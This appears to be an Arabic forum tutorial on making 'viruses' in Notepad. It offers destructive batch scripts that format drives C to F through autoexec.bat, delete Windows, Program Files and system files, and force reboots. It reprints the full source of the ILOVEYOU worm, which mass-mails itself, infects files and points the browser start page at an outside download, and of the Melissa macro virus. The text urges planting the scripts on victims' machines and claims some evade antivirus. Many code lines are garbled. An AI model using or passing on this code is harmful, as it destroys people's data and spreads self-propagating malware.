callattrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo as ansar
echo as ansar
c:\windows\rundll.exe user.exe,exitwindowsexec
وبعدلصقه في المفكرة
واحفظه بهذا الاسم
not.bat
إنتهى
ولا تفكر تفتح الملف بعد صنعه
**************************************************
عمل فورمات C,D,E,F والطابعه وقفل الجهاز
وقم بنسخ هذا الكود في المفكرة
call attrib -h -r c:\autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
echo format d: /q /u /autotest >nul >>c:\autoexec.bat
echo format e: /q /u /autotest >nul >>c:\autoexec.bat
echo format f: /q /u /autotest >nul >>c:\autoexec.bat
echo as ansar
echo as ansar
c:\windows\rundll32.exe user.exe,exitwindows
وبعدلصقه في المفكرة
واحفظه بهذا الاسم
not.bat
إنتهى
ولاتفكر تفتح الملف بعد صنعه
**************************************************
عمل فورمات للجهاز فورا
وقم بنسخ هذا الكود في المفكرة
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
وبعدلصقه في المفكرة
واحفظه بهذا الاسم
not.bat
إنتهى
ولاتفكر تفتح الملف بعد صنعه
************************************************** ***************************************************
اهم فايروس مدمر
وقم بنسخ هذا الكود في المفكرة
echo off@
cls
call attrib -h -r c:\autoexec.bat >nul
echo @echo off >c:\autoexec.bat
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
وبعد لصقه في المفكرة
واحفظه بهذا الاسم
not.bat
إنتهى
ولاتفكر تفتح الملف بعد صنعه
هذا فايرس بصراحه حقير وهذا الرابط يشرح لكم
http://www.youtube.com/watch?v=EiHHk...eature=related
وهذا الكود
@echo off
del %systemdrive%\*.*/f/s/q
shutdown -r -f -t 00
ثانيا :اعمل save ب اسم whatever.bat
ثالثا: اعمل all files فى save as type
إنتهى
************************************************** ****
ملاحظه هاااااامه جدا جدا جدا
معظم هذه الفيروسات يتم إكتشافها من قبل المضاد للفيروسات
ولكن هذه بعض الفيروسات التي لا يستطيع المضاد الإمساك بها والمثال على هذه الفيروسات
عمل فورمات C,D,E,F
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
echo as ansar
echo as ansar
c:windowsrundll.exe user.exe,exitwindowsexec
إنتهى
************************************************** *********
عمل فورمات C,D,E,F
call attrib -h -r c:autoexec.bat >nul
echo format c: /q /u /autotest >nul >>c:autoexec.bat
echo format d: /q /u /autotest >nul >>c:autoexec.bat
echo format e: /q /u /autotest >nul >>c:autoexec.bat
echo format f: /q /u /autotest >nul >>c:autoexec.bat
echo as ansar
echo as ansar
c:windowsrundll32.exe user.exe,exitwindows
إنتهى
************************************************** *********
تدمير الوندوز وحذف الملفات بعد التشغيل مباشره
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo as ansar
إنتهى
************************************************** *********
قتل الوندوز وحذف كل الملفات بعد اول اعادةتشغيل للجهاز
call attrib -h -r c:autoexec.bat >nul
@Echo off
c:
cd %WinDir%System
deltree /y *.dll
cd
deltree /y *.sys
echo as ansar
إنتهى
************************************************** *********
عمل فورمات للجهاز فورا
code:--------------------------------------------------------------------------------echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul>>c:autoexec.bat--------------------------------------------------------------------------------
إنتهى
************************************************** *********
اهم فورمات البنسبه الي
echo off@
cls
call attrib -h -r c:autoexec.bat >nul
echo @echo off >c:autoexec.bat
echo deltree /y crogra~1*.* >nul >>c:autoexec.bat
echo copy c:windowscommandformat.com c: >nul >>c:autoexec.bat
echo copy c:windowscommanddeltree.exe c: >nul >>c:autoexec.bat
echo deltree /y c:windows*.* >nul >>c:autoexec.bat
echo format c: /q /u /autotest >nul >>c:autoexec.bat
إنتهى
************************************************** *********
جميع الفيروسات السابقه تحفظ على النوت باد بإمتداد bat
مثال: limeware.bat
Soso.bat
FBI.bat
هذهأمثله ولكم حريه إختيار الإسم
وأكرر إياكم فتح هذه الفيروسات على أجهزتكم
إياكم أن تقومو بتجربتها على أجهزتكم
************************************************** *********
الفايروسات القويه الحب
كما تعلمنا سابقا
rem barok -loveletter(vbe) <i hate go to school>rem by: spyder / ispyder@mail.com / @grammersoft group /
Manila,Philippines
On Error Resume Next
Dim fso,dirsystem,dirwin,dirtemp,eq,ctr,file,vbscopy,d ow
eq=""
ctr=0
Set fso = CreateObject("Scripting.FileSystemObject")
Set file = fso.OpenTextFile(WScript.ScriptFullname,1)
vbscopy=file.ReadAll
main()
Sub main()
On Error Resume Next
Dim wscr,rr
Set wscr=CreateObject("WScript.Shell")
rr=wscr.RegRead("HKEY_CURRENT_USER\oftware\icrosof t\indows Scripting
Host\ettings\imeout")
If (rr>=1) Then
wscr.RegWrite "HKEY_CURRENT_USER\oftware\icrosoft\indows Scripting
Host\ettings\imeout",0,"REG_DWORD"
End If
Set dirwin = fso.GetSpecialFolder(0)
Set dirsystem = fso.GetSpecialFolder(1)
Set dirtemp = fso.GetSpecialFolder(2)
Set c = fso.GetFile(WScript.ScriptFullName)
c.Copy(dirsystem&"\SKernel32.vbs")
c.Copy(dirwin&"\in32DLL.vbs")
c.Copy(dirsystem&"\OVE-LETTER-FOR-YOU.TXT.vbs")
regruns()
html()
spreadtoemail()
listadriv()
End Sub
Sub regruns()
On Error Resume Next
Dim num,downread
regcreate
"HKEY_LOCAL_MACHINE\oftware\icrosoft\indows\urrent V ersion\un\SKernel32
",dirsystem&"\SKernel32.vbs"
regcreate
"HKEY_LOCAL_MACHINE\oftware\icrosoft\indows\urrent V ersion\unServices\i
n32DLL",dirwin&"\in32DLL.vbs"
downread=""
downread=regget("HKEY_CURRENT_USER\oftware\icrosof t\nternet
Explorer\ownload Directory")
If (downread="") Then
downread="c:\
End If
If (fileexist(dirsystem&"\inFAT32.exe")=1) Then
Randomize
num = Int((4 * Rnd) + 1)
If num = 1 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~young1s/HJKhjnwerhjkxcvytwertnMTFwetrdsfmhPnj
w6587345gvsdf7679njbvYT/WIN-BUGSFIX.exe"
ElseIf num = 2 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~angelcat/skladjflfdjghKJnwetryDGFikjUIyqwerWe
546786324hjk4jnHHGbvbmKLJKjhkqj4w/WIN-BUGSFIX.exe"
ElseIf num = 3 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~koichi/jf6TRjkcbGRpGqaq198vbFV5hfFEkbopBdQZnm
POhfgER67b3Vbvg/WIN-BUGSFIX.exe"
ElseIf num = 4 Then
regcreate "HKCU\oftware\icrosoft\nternet Explorer\ain\tart
Page","http://www.skyinet.net/~chu/sdgfhjksdfjklNBmnfgkKLHjkqwtuHJBhAFSDGjkh
YUgqwerasdjhPhjasfdglkNBhbqwebmznxcbvnmadshfgqw237 461234iuy7thjg/WIN-BUGSFIX
.exe"
End If
End If
If (fileexist(downread&"\IN-BUGSFIX.exe")=0) Then
regcreate
"HKEY_LOCAL_MACHINE\oftware\icrosoft\indows\urrent V ersion\un\IN-BUGSFI
X",downread&"\IN-BUGSFIX.exe"
regcreate "HKEY_CURRENT_USER\oftware\icrosoft\nternet Explorer\ain\tart
Page","about_:blank"
End If
End Sub
Sub listadriv
On Error Resume Next
Dim d,dc,s
Set dc = fso.Drives
For Each d In dc
If d.DriveType = 2 Or d.DriveType=3 Then
folderlist(d.path&"\)
End If
Next
listadriv = s
End Sub
Sub infectfiles(folderspec)
On Error Resume Next
Dim f,f1,fc,ext,ap,mircfname,s,bname,mp3
Set f = fso.GetFolder(folderspec)
Set fc = f.Files
For Each f1 In fc
ext=fso.GetExtensionName(f1.path)
ext=LCase(ext)
s=LCase(f1.Name)
If (ext="vbs") Or (ext="vbe") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.write vbscopy
ap.Close
ElseIf(ext="js")Or (ext="jse") Or (ext="css") Or (ext="wsh") Or(ext="sct")
Or (ext="hta") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.write vbscopy
ap.Close
bname=fso.GetBaseName(f1.path)
Set cop=fso.GetFile(f1.path)
cop.copy(folderspec&"\&bname&".vbs")
fso.DeleteFile(f1.path)
ElseIf(ext="jpg") Or (ext="jpeg") Then
Set ap=fso.OpenTextFile(f1.path,2,True)
ap.write vbscopy
ap.Close
Set cop=fso.GetFile(f1.path)
cop.copy(f1.path&".vbs")
fso.DeleteFile(f1.path)
ElseIf(ext="mp3") Or (ext="mp2") Then
Set mp3=fso.CreateTextFile(f1.path&".vbs")
mp3.write vbscopy
mp3.Close
Set att=fso.GetFile(f1.path)
att.attributes=att.attributes+2
End If
If (eq<>folderspec) Then
If (s="mirc32.exe") Or (s="mlink32.exe") Or(s="mirc.ini") Or
(s="script.ini") Or (s="mirc.hlp") Then
Set scriptini=fso.CreateTextFile(folderspec&"\cript.in i")
scriptini.WriteLine "[script]"
scriptini.WriteLine ";mIRC Script"
scriptini.WriteLine "; Please dont edit this script... mIRC will corrupt,
if mIRC will"
scriptini.WriteLine " corrupt... WINDOWS will affect and will not run
correctly. thanks"
scriptini.WriteLine ";"
scriptini.WriteLine ";Khaled Mardam-Bey"
scriptini.WriteLine ";http://www.mirc.com/"
scriptini.WriteLine ";"
scriptini.WriteLine "n0=on 1:JOIN:#:{
scriptini.WriteLine "n1= /if ( $nick == $me ) {halt }
scriptini.WriteLine "n2= /.dcc send $nick
"&dirsystem&"\OVE-LETTER-FOR-YOU.HTM"
scriptini.WriteLine "n3=}
scriptini.Close
eq=folderspec
End If
End If
Next
End Sub
Sub folderlist(folderspec)
On Error Resume Next
Dim f,f1,sf
Set f = fso.GetFolder(folderspec)
Set sf = f.SubFolders
For Each f1 In sf
infectfiles(f1.path)
folderlist(f1.path)
Next
End Sub
Sub regcreate(regkey,regvalue)
Set regedit = CreateObject("WScript.Shell")
regedit.RegWrite regkey,regvalue
End Sub
Function regget(value)
Set regedit = CreateObject("WScript.Shell")
regget=regedit.RegRead(value)
End Function
Function fileexist(filespec)
On Error Resume Next
Dim msg
If (fso.FileExists(filespec)) Then
msg = 0
Else
msg = 1
End If
fileexist = msg
End Function
Function folderexist(folderspec)
On Error Resume Next
Dim msg
If (fso.GetFolderExists(folderspec)) Then
msg = 0
Else
msg = 1
End If
fileexist = msg
End Function
Sub spreadtoemail()
On Error Resume Next
Dim x,a,ctrlists,ctrentries,malead,b,regedit,regv,rega d
Set regedit=CreateObject("WScript.Shell")
Set out=WScript.CreateObject("Outlook.Application")
Set mapi=out.GetNameSpace("MAPI")
For ctrlists=1 To mapi.AddressLists.Count
Set a=mapi.AddressLists(ctrlists)
x=1
regv=regedit.RegRead("HKEY_CURRENT_USER\oftware\ic rosoft\AB\&a)
If (regv="") Then
regv=1
End If
If (Int(a.AddressEntries.Count)>Int(regv)) Then
For ctrentries=1 To a.AddressEntries.Count
malead=a.AddressEntries(x)
regad=""
regad=regedit.RegRead("HKEY_CURRENT_USER\oftware\i crosoft\AB\&malead)
If (regad="") Then
Set male=out.CreateItem(0)
male.Recipients.Add(malead)
male.Subject = "ILOVEYOU"
male.Body = vbcrlf&"kindly check the attached LOVELETTER coming fromme."
male.Attachments.Add(dirsystem&"\OVE-LETTER-FOR-YOU.TXT.vbs")
male.Send
regedit.RegWrite
"HKEY_CURRENT_USER\oftware\icrosoft\AB\&malead,1," REG_DWORD"
End If
x=x+1
Next
regedit.RegWrite
"HKEY_CURRENT_USER\oftware\icrosoft\AB\&a,a.Addres sEntries.Count
Else
regedit.RegWrite
"HKEY_CURRENT_USER\oftware\icrosoft\AB\&a,a.Addres sEntries.Count
End If
Next
Set out=Nothing
Set mapi=Nothing
End Sub
Sub html
On Error Resume Next
Dim lines,n,dta1,dta2,dt1,dt2,dt3,dt4,l1,dt5,dt6
dta1="<HTML><HEAD><TITLE>LOVELETTER -HTML<?-?TITLE><META
NAME=@-@Generator@-@ CONTENT=@-@BAROK VBS -LOVELETTER@-@>"&vbcrlf& _
"<META NAME=@-@Author@-@ CONTENT=@-@spyder ?-? ispyder@mail.com ?-?
@GRAMMERSoft Group ?-? Manila, Philippines ?-? March2000@-@>"&vbcrlf& _
"<META NAME=@-@Description@-@ CONTENT=@-@simple but i think this is
good...@-@>"&vbcrlf& _
"<?-?HEAD><BODY
ONMOUSEOUT=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ "&vbcrlf& _
"ONKEYDOWN=@-@window.name=#-#main#-#;window.open(#-#LOVE-LETTER-FOR-YOU.HTM#
-#,#-#main#-#)@-@ BGPROPERTIES=@-@fixed@-@BGCOLOR=@-@#FF9933@-@>"&vbcrlf& _
"<CENTER><p>This HTML file need ActiveXControl<?-?p><p>To Enable to read
this HTML file<BR>- Please press #-#YES#-# button to Enable
ActiveX<?-?p>"&vbcrlf& _
"<?-?CENTER><MARQUEE LOOP=@-@infinite@-@
BGCOLOR=@-@yellow@-@>----------z--------------------z----------<?-?MARQUEE>
"&vbcrlf& _
"<?-?BODY><?-?HTML>"&vbcrlf& _
"<SCRIPT language=@-@JScript@-@>"&vbcrlf& _
"<!--?-??-?"&vbcrlf& _
"if (window.screen){ar wi=screen.availWidth;var
hi=screen.availHeight;window.moveTo(0,0);window.re sizeTo(wi,hi);}&vbcrlf&_
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"&vbcrlf& _
"<SCRIPT LANGUAGE=@-@VBScript@-@>"&vbcrlf& _
"<!--"&vbcrlf& _
"on error resume next"&vbcrlf& _
"dim fso,dirsystem,wri,code,code2,code3,code4,aw,regdit "&vbcrlf& _
"aw=1"&vbcrlf& _
"code="
dta2="setfso=CreateObject(@-@Scripting.FileSystemObject@-@)"&vbcrlf& _
"set dirsystem=fso.GetSpecialFolder(1)"&vbcrlf& _
"code2=replace(code,chr(91)&chr(45)&chr(91),chr(39 ))"&vbcrlf&_
"code3=replace(code2,chr(93)&chr(45)&chr(93),chr(3 4))"&vbcrlf&_
"code4=replace(code3,chr(37)&chr(45)&chr(37),chr(9 2))"&vbcrlf&_
"setwri=fso.CreateTextFile(dirsystem&@-@^-^MSKernel32.vbs@-@)"&vbcrlf&_
"wri.write code4"&vbcrlf& _
"wri.close"&vbcrlf& _
"if (fso.FileExists(dirsystem&@-@^-^MSKernel32.vbs@-@))then"&vbcrlf& _
"if (err.number=424) then"&vbcrlf& _
"aw=0"&vbcrlf& _
"end if"&vbcrlf& _
"if (aw=1) then"&vbcrlf& _
"document.write @-@ERROR: can#-#t initializeActiveX@-@"&vbcrlf& _
"window.close"&vbcrlf& _
"end if"&vbcrlf& _
"end if"&vbcrlf& _
"Set regedit = CreateObject(@-@WScript.Shell@-@)"&vbcrlf& _
"regedit.RegWrite
@-@HKEY_LOCAL_MACHINE^-^Software^-^Microsoft^-^Windows^-^CurrentVersion^-^Ru
n^-^MSKernel32@-@,dirsystem&@-@^-^MSKernel32.vbs@-@"&vbcrlf& _
"?-??-?-->"&vbcrlf& _
"<?-?SCRIPT>"
dt1=replace(dta1,Chr(35)&Chr(45)&Chr(35),"'")
dt1=replace(dt1,Chr(64)&Chr(45)&Chr(64),"""")
dt4=replace(dt1,Chr(63)&Chr(45)&Chr(63),"/")
dt5=replace(dt4,Chr(94)&Chr(45)&Chr(94),"\)
dt2=replace(dta2,Chr(35)&Chr(45)&Chr(35),"'")
dt2=replace(dt2,Chr(64)&Chr(45)&Chr(64),"""")
dt3=replace(dt2,Chr(63)&Chr(45)&Chr(63),"/")
dt6=replace(dt3,Chr(94)&Chr(45)&Chr(94),"\)
Set fso=CreateObject("Scripting.FileSystemObject")
Set c=fso.OpenTextFile(WScript.ScriptFullName,1)
lines=Split(c.ReadAll,vbcrlf)
l1=UBound(lines)
For n=0 To UBound(lines)
lines(n)=replace(lines(n),"'",Chr(91)+Chr(45)+Chr( 91))
lines(n)=replace(lines(n),"""",Chr(93)+Chr(45)+Chr (93))
lines(n)=replace(lines(n),"\,Chr(37)+Chr(45)+Chr(3 7))
If (l1=n) Then
lines(n)=Chr(34)+lines(n)+Chr(34)
Else
lines(n)=Chr(34)+lines(n)+Chr(34)&"&vbcrlf& _"
End If
Next
Set b=fso.CreateTextFile(dirsystem+"\OVE-LETTER-FOR-YOU.HTM")
b.Close
Set d=fso.OpenTextFile(dirsystem+"\OVE-LETTER-FOR-YOU.HTM",2)
d.write dt5
d.write join(lines,vbcrlf)
d.write vbcrlf
d.write dt6
d.Close
End Sub
************************************************** *********
فايروسمليسيا فايروس خطير
Private Sub AutoOpen() On Error Resume Next
p$ = "clone"
If System.PrivateProfileString("", "HKEY_CURRENT_USER\oftware\icrosoft\ffice\.0\ord\e curity","Level") <> "" Then
CommandBars("Macro").Controls("Security...").Enabl ed =False
System.PrivateProfileString("","HKEY_CURRENT_USER\ oftware\icrosoft\ffice\.0\ord\ecurity","Level") = 1&
Else
p$ = "clone"
CommandBars("Tools").Controls("Macro").Enabled = False
Options.ConfirmConversions = (1 - 1): Options.VirusProtection = (1 - 1):Options.SaveNormalPrompt = (1 - 1)
End If
Dim UngaDasOutlook, DasMapiName, BreakUmOffASlice
Set UngaDasOutlook = CreateObject("Outlook.Application")
Set DasMapiName = UngaDasOutlook.GetNameSpace("MAPI")
If System.PrivateProfileString("","HKEY_CURRENT_USER\ oftware\icrosoft\ffice\, "Melissa?") <>"... by Kwyjibo" Then
If UngaDasOutlook = "Outlook" Then
DasMapiName.Logon "profile", "password"
For y = 1 To DasMapiName.AddressLists.Count
Set AddyBook = DasMapiName.AddressLists(y)
x = 1
Set BreakUmOffASlice = UngaDasOutlook.CreateItem(0)
For oo = 1 To AddyBook.AddressEntries.Count
Peep = AddyBook.AddressEntries(x)
BreakUmOffASlice.Recipients.Add Peep
x = x + 1
If x > 50 Then oo = AddyBook.AddressEntries.Count
Next oo
BreakUmOffASlice.Subject = "Important Message From " &Application.UserName
BreakUmOffASlice.Body = "Here is that document you asked for ... don'tshow anyone else ;-)"
BreakUmOffASlice.Attachments.Add ActiveDocument.FullName
BreakUmOffASlice.Send
Peep = ""
Next y
DasMapiName.Logoff
End If
p$ = "clone"
System.PrivateProfileString("","HKEY_CURRENT_USER\ oftware\icrosoft\ffice\, "Melissa?") ="... by Kwyjibo"
End If
Set ADI1 = ActiveDocument.VBProject.VBComponents.Item(1)
Set NTI1 = NormalTemplate.VBProject.VBComponents.Item(1)
NTCL = NTI1.CodeModule.CountOfLines
ADCL = ADI1.CodeModule.CountOfLines
BGN = 2
If ADI1.Name <> "Melissa" Then
If ADCL > 0 Then _
ADI1.CodeModule.DeleteLines 1, ADCL
Set ToInfect = ADI1
ADI1.Name = "Melissa"
DoAD = True
End If
If NTI1.Name <> "Melissa" Then
If NTCL > 0 Then _
NTI1.CodeModule.DeleteLines 1, NTCL
Set ToInfect = NTI1
NTI1.Name = "Melissa"
DoNT = True
End If
If DoNT <> True And DoAD <> True Then GoTo CYA
If DoNT = True Then
Do While ADI1.CodeModule.Lines(1, 1) = ""
ADI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Close()")
Do While ADI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
p$ = "clone"
If DoAD = True Then
Do While NTI1.CodeModule.Lines(1, 1) = ""
NTI1.CodeModule.DeleteLines 1
Loop
ToInfect.CodeModule.AddFromString ("Private Sub Document_Open()")
Do While NTI1.CodeModule.Lines(BGN, 1) <> ""
ToInfect.CodeModule.InsertLines BGN, NTI1.CodeModule.Lines(BGN, 1)
BGN = BGN + 1
Loop
End If
CYA:
If NTCL <> 0 And ADCL = 0 And (InStr(1, ActiveDocument.Name,"Document") = False) Then
ActiveDocument.SaveAs FileName:=ActiveDocument.FullName
ElseIf (InStr(1, ActiveDocument.Name, "Document") <> False)Then
ActiveDocument.Saved = True: End If
'WORD/Melissa written by Kwyjibo
'Clone written by Duke/SMF
'Works in both Word 2000 and Word 97
'Worm? Macro Virus? Word 97 Virus? Word 2000 Virus? You Decide!
'Word -> Email | Word 97 <--> Word 2000 ... it's a new age!
If Day(Now) = Minute(Now) Then Selection.TypeText "Twenty-two points,plustriple-word-score, plus fifty points for using all my letters.Game's over. I'moutta here."
End Sub
************************************************** *********
سوف نقوم الآن بتعلم تصميم الفيروسات بواسطة notepad
إذا أردتم تصميم فيروس بهذا النوع من التصميمات يجب أن تعرفوا كيف تضعون الأكواد التي سوف أعطيها لكم و هي عن طريق فتح برنامج notepad وكتابة الكود فيه ثم حفظه بأي اسم تريده ولكن بامتداد .bat
و الآن كل ما عليكم هو أن تضعوا الكود الذي ترغبون فيه ونسخه إلى notepad و تحفظه و بعدها يكون الفيروس قد أنشئ ولكن أحذر كما تعرفون لا تفتحوا الملف وإلا ...... وقد أعذر من أنذر
نبدا بسم الله :
الكود الأول :
---------------------
الـتوضـــــــــــتيح :
* بعد أن قمت بوضع الكود و حفظه بامتداد .bat فأنت هكذا تكون قد قمت بعمل فيروس و سوف تلحظ أن شكل الأيقونة قد أصبح بهذا الشكل :
* هذا الفيروس يقوم على مسح كل ملفات dll و sys من system وهذا ما سوف نلحظه بالنظر إلى الكود و به سوف نجد أنه كتب فى هذا الكود امر " deltree " و هو الخاص بمسح الملفات ثم كتب بعد ذلك " *.dll كما كتب *.sys " و هو انى قد اعطيت له بان يمسح كل الملفات التى لها الأمتدادين السابقين و يمكن ملاحظة شيء آخر و هو كون الكمبيوتر يمسح الملفات من system و سوف نجد فى أول الكود الأمر الخاص بذلك فسوف تجد أنه قد أعطى له الأمر بالذهاب إلى c: و كما أعطاه الأمر بالذهاب لملفات الوندوز عندما أصدرنا له الأمر windir ثم أخبرناه أن الأوامر التالية يجب أن تكون داخل ملف system و هو موجود ضمن ملفات الويندوز
* بعد أن فهمنا هذه الأوامر ..... هل هناك من يستطيع الإجابة على سؤالي و هو : هل يمكننا تعديل هذا الكود ؟!!
لن ادعكم تفكرون طويلا فى الأجابة سوف أجيب بكل بساطة عن السؤال و هو يمكننا أن نغير أى شئ قد فهمناه جيدا لذا يمكننا أن نغير هذا الكود قليلا وسأخبركم عما هو يمكننا أن نغيره و طبعا أنتم تعرفون المكان الذي يمكننا أن نغيره في الكود فيمكننا أن نغير نوعية الملفات التى سيقوم بمسحها أو يمكننا زيادتها كما يمكننا أن نغير المكان الذى سوف يوجد فيه فمثلا هناك يوجد أنواع لأنظمة التشغيل فهناك من يضع مثلا ويندوز 98 و هناك من يضع Xp لذا يمكننا أن نغير اتجاه الفيروس إلى d:
مثال توضيحى :
أنا الآن أريد أن أمزح مع أحد و فى نفس الوقت أريد أن اعلمه درس فيمكنني أن أصنع فيروس يقوم بمسح جميع ملفات الصور التى امتددها *.jpg. كما أننى أريد أن أمسح جميع الملفات التي امتددها *.mp3 و جميع امتدادت الملفات الخاصة بالأفلام و التي امتدادها *.asf و التى توجد في E: كل ما علينا هو تعديل الكود ليصبح هكذا:
ما رأيكم في الفيروس الجديد أتمنى أن يعجبكم أما الآن ندخل في الكود الثاني:
----------------
الكود الثانى :
--------------
الـتوضــــــــــيح :
الفيروس السابق يعتبر من الأفكار الجيدة للزين هما من محبين فى البرمجة وافهمين فى فكرة عمل لكمبيوتر و ليس ممن هم من هواة تعلم برنامج صغير ثم يقول عى نفسه خبير كمبيوتر
نبدا بتوضيح الكود : فكما نرى فى الكود اول سطر مجرد فائدته مسح الشاشة من أي أمر أو تعليق مسبق حتى يجعل عمل هذا الفيروس هو الوحيد
بعدها سوف نجد مجموعة من السطور هي تقريبا مكرره فكرتها وليس مكرر عملها ولكن يمكننا أن نوضح انه هناك 3 أكود منفصلة هي الفكرة الأساسيه و هي ما سوف نوضحه
echo deltree /y c:\progra~1\*.* >nul >>c:\autoexec.bat
يعطي هذا المود الأمر للكمبيوتر بمسح الفولدر program files والذى يوجد فيه جميع البرامج التي تنزل على الجهاز و نلاحظ تكراره في مسح الويندوز فى الكود
echo deltree /y c:\windows\*.* >nul >>c:\autoexec.bat
ولكنه اذا قام بمسح الويندوز فهو لن يستطيع عمل فورمات بعد ذلك لذا فقبل ذلك أعطى أمر نسخ لهذين الأمرين حتى يمكننا استخدامهم فيما بعد و هذا هو ما اعطاه هذان السطرين
echo copy c:\windows\command\format.com c:\ >nul >>c:\autoexec.bat
echo copy c:\windows\command\deltree.exe c:\ >nul >>c:\autoexec.bat
اما بعد ذلك فهو أعطاه الأمر بعمل فورمات للجهاز و هذا كما هو موجود فى السطر التالى
echo format c: /q /u /autotest >nul >>c:\autoexec.bat
أولا يوجد بعض الأمور يجب توضيحها قبل البدء في هذا الموضوع وهو أنه بوضع هذا الفيروس فى الـC:
سوف يجعله يعمل تلقائيا عند فتح الجهاز لذا لا تحفظه فى هذا partion اما إذا كنت في عملية هكر لجهاز فقم تحميل هذا الفيروس الى الـC: عنده ثم دعه يتمتع بذلك بعد ان يفتح جهازه
ولاكني وجدت فيه عيب بسيط و هو أن هذا الفيروس لن يعمل فى جهاز وضع فيه غير ملف windows فمثلا إذا كان هناك ضحيه يوجد عندها ويندوز موضوع داخل ملف win98 فإن الفيروس الذي كوناه لن يقوم ببعض الأعمال و هي نسخ الأوامر و مسح الويندوز ولكنه سوف يقوم بعمل فورمات
أما بالنسبة لتعديله فكل ما أستطيع أن أعطيكم إياه من تعديل مفيد فيه و هو أن تمسحوا أوامر مسح الويندوز و Program files و تدع أمر الفورمات مع تغيير مثلا أنه يقوم بفورمات على الـ D: فيكون لكود كما يلى
----------------
الكود الثالث :
--------------
يعتبر هذا الفيروس نفس عمل السابق لذا انا لست بحاجه الى توضيحه او اخباركم بما انتم يجب ان تقومو به حتى تعدلوه
كل ما انا يجب ان اقوله لكم بخصوص هذا الكود انه يجب عليكم ان تسمه بـ Autoexec.bat
الآن و بعد أن تعرفنا على الأكواد السابقة ما رأيكم فى جعل هذا الفيروس اقوى بان نضيف اليه بعض الخصائص و سوف اوضح اكواده
الخاصــــــــــــــية الأولى :-
يعطي هذا الكود للفيروس خاصية نسخ نفسه إلى مكان آخر حتى لا يمكن للضحيه ايقافه بمجرد مسحه .
الخاصــــــــــــــية الثانيه :-
يعطى هذا الكود للفيروس خاصية انه يمكنه من ان يشتغل تلقائيا عند فتح الجهاز و هذا عن طريق تعديل ال registry :
هذا هو كل ما حصلت عليه من أكواد للفيروسات فلقد شرحت لكم مجموعه من أكواد الفيروسات التي يمكننا استخدامها و مجموعه من الأكواد التى بإضافتها للفيروس تعطي له خصائص مفيدة
يتبقى لنا شيء بسيط وهو هذا الجزء و هو مجموعة أكواد لبعض الفيروسات
______________
فيرووس C++ :
*****************
فيرووس Visual Basic :
*****************
فيروس Html
*****************
( ملاحظة يحفظ هذا الفيروس بأمتداد html .* )
يمكنك من دراسة هذه الأكواد و النظر فيها إلى ما قد يفيدكم فيمكنكم نقل بعض الأجزاء من الفيروسات السابقة و عمل فيروس قوى يخصكم
هذا هو كل ما لدي فى هذا الجزء و هو كما قلت لكم سابقا هو قابل للتطوير
ولا تنسوا ....... ردودكم الطيبة
إذا أردتم تصميم فيروس بهذا النوع من التصميمات يجب أن تعرفوا كيف تضعون الأكواد التي سوف أعطيها لكم و هي عن طريق فتح برنامج notepad وكتابة الكود فيه ثم حفظه بأي اسم تريده ولكن بامتداد .bat
و الآن كل ما عليكم هو أن تضعوا الكود الذي ترغبون فيه ونسخه إلى notepad و تحفظه و بعدها يكون الفيروس قد أنشئ ولكن أحذر كما تعرفون لا تفتحوا الملف وإلا ...... وقد أعذر من أنذر
نبدا بسم الله :
الكود الأول :
---------------------
كود:
@Echo off c: cd %WinDir%\System\ deltree /y *.dll cd\ deltree /y *.sys
* بعد أن قمت بوضع الكود و حفظه بامتداد .bat فأنت هكذا تكون قد قمت بعمل فيروس و سوف تلحظ أن شكل الأيقونة قد أصبح بهذا الشكل :
